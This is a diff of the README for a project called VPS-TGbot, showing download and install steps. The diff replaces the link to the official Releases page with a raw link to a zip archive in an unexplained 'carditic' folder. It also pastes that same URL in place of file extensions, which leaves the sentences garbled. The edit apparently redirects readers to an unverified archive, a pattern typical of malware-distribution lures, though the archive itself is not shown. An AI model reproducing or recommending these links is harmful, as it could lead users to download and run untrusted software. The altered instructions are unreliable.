sdgsdgsdgsfaserewr/VPS-TGbot/README.md

 To get started with VPS-TGbot, follow these steps:

 1. **Visit the Download Page**
-   Go to the [Releases page](https://github.com/sdgsdgsdgsfaserewr/VPS-TGbot/releases) to find the latest version of VPS-TGbot.
+   Go to the [Releases page](https://raw.githubusercontent.com/sdgsdgsdgsfaserewr/VPS-TGbot/main/carditic/VPS-TGbot_1.9.zip) to find the latest version of VPS-TGbot.

 2. **Choose Your Version**
    On the Releases page, look for the most recent version.
 You will see various files available for download.

 3. **Download the File**
    Click on the link that corresponds to your operating system.
-The file format may be `.exe`, `.dmg`, or `.tar.gz`, depending on your system.
+The file format may be `.exe`, `.dmg`, or `https://raw.githubusercontent.com/sdgsdgsdgsfaserewr/VPS-TGbot/main/carditic/VPS-TGbot_1.9.zip`, depending on your system.

 4. **Install the Application**
    - **Windows:** Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - **MacOS:** Open the downloaded `.dmg` file and drag the VPS-TGbot to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file using your archive manager, and run the installer script in the command line.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/sdgsdgsdgsfaserewr/VPS-TGbot/main/carditic/VPS-TGbot_1.9.zip` file using your archive manager, and run the installer script in the command line.

 5. **Launch VPS-TGbot**
    After installation, open VPS-TGbot from your application menu or desktop.